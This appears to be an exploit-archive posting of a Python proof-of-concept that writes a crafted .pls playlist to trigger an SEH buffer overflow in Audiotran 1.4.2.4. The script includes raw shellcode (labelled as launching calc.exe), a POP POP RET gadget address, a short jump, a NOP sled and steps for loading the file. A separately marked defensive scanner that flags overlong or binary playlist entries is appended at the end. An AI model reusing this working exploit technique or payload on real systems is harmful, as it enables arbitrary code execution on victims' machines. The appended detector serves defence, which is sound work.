
[local exploits] - Audiotran 1.4.2.4 SEH Overflow Exploit

Posted on 08 September 2010

======================================
Audiotran 1.4.2.4 SEH Overflow Exploit
======================================

#!/usr/bin/python
# Audiotran 1.4.2.4 SEH Overflow Exploit 0 day
# Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
# Web - http://www.aslitsecurity.com/
# Blog - http://www.aslitsecurity.blogspot.com/
# Download Vulnerable application from http://www.e-soft.co.uk/Audiotran.htm
# Vulnerable version Audiotran 1.4.2.4
# Tested on XP SP2
# Greets Villy, Puneet Jain, Abhishek Sahni and ASL IT SECURITY TEAM
#
# To load the playlist file in Audiotran, copy the ASL.pls file into
# C:\Program Files\Audiotran, click on "load playlist" and double-click on ASL.pls

filename = "ASL.pls"

# windows/exec - CMD=calc.exe (227 bytes)
shellcode = (
    b"\xDB\xDF\xD9\x74\x24\xF4\x58\x2B\xC9\xB1\x33\xBA"
    b"\x4C\xA8\x75\x76\x83\xC0\x04\x31\x50\x13\x03\x1C\xBB\x97\x83\x60"
    b"\x53\xDE\x6C\x98\xA4\x81\xE5\x7D\x95\x93\x92\xF6\x84\x23\xD0\x5A"
    b"\x25\xCF\xB4\x4E\xBE\xBD\x10\x61\x77\x0B\x47\x4C\x88\xBD\x47\x02"
    b"\x4A\xDF\x3B\x58\x9F\x3F\x05\x93\xD2\x3E\x42\xC9\x1D\x12\x1B\x86"
    b"\x8C\x83\x28\xDA\x0C\xA5\xFE\x51\x2C\xDD\x7B\xA5\xD9\x57\x85\xF5"
    b"\x72\xE3\xCD\xED\xF9\xAB\xED\x0C\x2D\xA8\xD2\x47\x5A\x1B\xA0\x56"
    b"\x8A\x55\x49\x69\xF2\x3A\x74\x46\xFF\x43\xB0\x60\xE0\x31\xCA\x93"
    b"\x9D\x41\x09\xEE\x79\xC7\x8C\x48\x09\x7F\x75\x69\xDE\xE6\xFE\x65"
    b"\xAB\x6D\x58\x69\x2A\xA1\xD2\x95\xA7\x44\x35\x1C\xF3\x62\x91\x45"
    b"\xA7\x0B\x80\x23\x06\x33\xD2\x8B\xF7\x91\x98\x39\xE3\xA0\xC2\x57"
    b"\xF2\x21\x79\x1E\xF4\x39\x82\x30\x9D\x08\x09\xDF\xDA\x94\xD8\xA4"
    b"\x05\x77\xC9\xD0\xAD\x2E\x98\x59\xB0\xD0\x76\x9D\xCD\x52\x73\x5D"
    b"\x2A\x4A\xF6\x58\x76\xCC\xEA\x10\xE7\xB9\x0C\x87\x08\xE8\x6E\x46"
    b"\x9B\x70\x5F\xED\x1B\x12\x9F"
)

# "[playlist]\r\nFile1=" - the PLS header followed by the start of the overlong entry
head = b"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D"
junk = b"\x41" * 1940
nseh = b"\xeb\x06\x90\x90"  # Short Jump (jmp short +6 over the handler address)
seh  = b"\xcb\x75\x52\x73"  # POP POP RET 0x735275CB msvbvm60.dll
nop  = b"\x90" * 12         # NOP Sled
padd = b"\x90" * (5000 - len(junk + nseh + seh + nop + shellcode))

# Binary mode, so the \x0D\x0A in the header is written untranslated on Windows
with open(filename, "wb") as textfile:
    textfile.write(head + junk + nseh + seh + nop + shellcode + padd)

# Inj3ct0r.com [2010-09-08]
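As an added defensive example (not part of the advisory above or the author's code): a small Python checker that flags .pls playlist entries whose value is implausibly long or contains non-printable bytes, which are the two properties of the crafted File1= line this exploit writes. The length threshold and both sample playlists are constructed for the demonstration.

```python
"""Flag .pls playlist entries shaped like an overlong, binary File1= line."""
import re
import string

PRINTABLE = set(string.printable.encode())
MAX_VALUE_LEN = 1024  # assumed threshold: real paths and titles are far shorter

# Numbered Key=Value lines of a PLS file: File1=, Title1=, Length1=, ...
ENTRY_RE = re.compile(rb"^(File|Title|Length)(\d+)=(.*)$")


def scan_pls(data: bytes, max_len: int = MAX_VALUE_LEN) -> list:
    """Return (line_no, key, reason) findings for suspicious entries."""
    findings = []
    lines = data.split(b"\n")
    if lines[0].strip().lower() != b"[playlist]":
        findings.append((1, "header", "missing [playlist] header"))
    for no, raw in enumerate(lines, 1):
        m = ENTRY_RE.match(raw.rstrip(b"\r"))
        if not m:
            continue
        key = (m.group(1) + m.group(2)).decode("ascii")
        value = m.group(3)
        if len(value) > max_len:
            findings.append((no, key, "value length %d exceeds %d" % (len(value), max_len)))
        bad = sum(1 for b in value if b not in PRINTABLE)
        if bad:
            findings.append((no, key, "%d non-printable bytes in value" % bad))
    return findings


# Constructed samples: a normal playlist and one shaped like the crafted file
BENIGN_PLS = (b"[playlist]\r\nFile1=C:\\Music\\song.mp3\r\nTitle1=Song\r\n"
              b"Length1=-1\r\nNumberOfEntries=1\r\nVersion=2\r\n")
MALICIOUS_PLS = (b"[playlist]\r\nFile1=" + b"A" * 2000
                 + bytes([0xEB, 0x06, 0x90, 0x90]) + b"\x90" * 40)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PLS), ("malicious", MALICIOUS_PLS)):
        print(name, scan_pls(sample) or "clean")
```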
